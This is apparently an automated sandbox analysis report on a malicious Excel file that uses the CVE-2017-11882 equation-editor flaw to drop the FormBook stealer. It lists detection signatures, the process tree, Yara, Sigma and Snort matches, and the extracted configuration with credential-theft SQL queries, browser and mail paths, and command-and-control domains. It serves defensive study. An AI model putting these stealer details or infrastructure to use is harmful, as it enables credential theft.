Loading ...

Play interactive tourEdit tour

Analysis Report Agreement.xlsx

Overview

General Information

Sample Name:Agreement.xlsx
Analysis ID:345179
MD5:199fa59c2168e232c33f2fe8809b78d0
SHA1:cbf3e8aedfd33ee4a070eef60dfddb87009f5414
SHA256:aae7b9ac8ddf709b9a6c1f841b90b8468d4a71eeb0fec6e30f1262b726e104ec
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2308 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2316 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2932 cmdline: 'C:\Users\Public\vbc.exe' MD5: F49E0B01E26E5E197421C4260DD87545)
      • vbc.exe (PID: 2492 cmdline: C:\Users\Public\vbc.exe MD5: F49E0B01E26E5E197421C4260DD87545)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wlanext.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
            • cmd.exe (PID: 2268 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79d9", "KEY1_OFFSET 0x1bae5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1bbe5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "fundamentaliemef.com", "gallerybrows.com", "leadeligey.com", "octoberx2.online", "climaxnovels.com", "gdsjgf.com", "curateherstories.com", "blacksailus.com", "yjpps.com", "gmobilet.com", "fcoins.club", "foreverlive2027.com", "healthyfifties.com", "wmarquezy.com", "housebulb.com", "thebabyfriendly.com", "primajayaintiperkasa.com", "learnplaychess.com", "chrisbubser.digital", "xn--avenr-wsa.com", "exlineinsurance.com", "thrivezi.com", "tuvandadayvitos24h.online", "illfingers.com", "usmedicarenow.com", "pandabutik.com", "engageautism.info", "magnabeautystyle.com", "texasdryroof.com", "woodlandpizzahartford.com", "dameadamea.com", "sedaskincare.com", "ruaysatu99.com", "mybestaide.com", "nikolaichan.com", "mrcabinetkitchenandbath.com", "ondemandbarbering.com", "activagebenefits.net", "srcsvcs.com", "cbrealvitalize.com", "ismaelworks.com", "medkomp.online", "ninasangtani.com", "h2oturkiye.com", "kolamart.com", "acdfr.com", "twistedtailgatesweeps1.com", "ramjamdee.com", "thedancehalo.com", "joeisono.com", "glasshouseroadtrip.com", "okcpp.com", "riggsfarmfenceservices.com", "mgg360.com", "xn--oi2b190cymc.com", "ctfocbdwholesale.com", "openspiers.com", "rumblingrambles.com", "thepoetrictedstudio.com", "magiclabs.media", "wellnesssensation.com", "lakegastonautoparts.com", "dealsonwheeeles.com", "semenboostplus.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.rizrvd.com/bw82/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2316, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2932
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 18.194.54.219, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2316, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2316, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm2[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2316, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2932
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2316, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2932
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2316, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2932

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.1.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79d9", "KEY1_OFFSET 0x1bae5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1bbe5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for domain / URLShow sources
          Source: ismaelworks.comVirustotal: Detection: 6%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm2[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.c70000.3.unpack
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000005.00000002.2203256000.0000000000559000.00000004.00000020.sdmp
          Source: global trafficDNS query: name: www.kolamart.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 18.194.54.219:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 18.194.54.219:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 198.185.159.144:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 19:06:06 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 27 Jan 2021 13:44:29 GMTETag: "df000-5b9e1f85fb6d0"Accept-Ranges: bytesContent-Length: 913408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ac 6d 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e6 0d 00 00 08 00 00 00 00 00 00 9e 04 0e 00 00 20 00 00 00 20 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 04 0e 00 53 00 00 00 00 20 0e 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 e4 0d 00 00 20 00 00 00 e6 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 05 00 00 00 20 0e 00 00 06 00 00 00 e8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0e 00 00 02 00 00 00 ee 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 0e 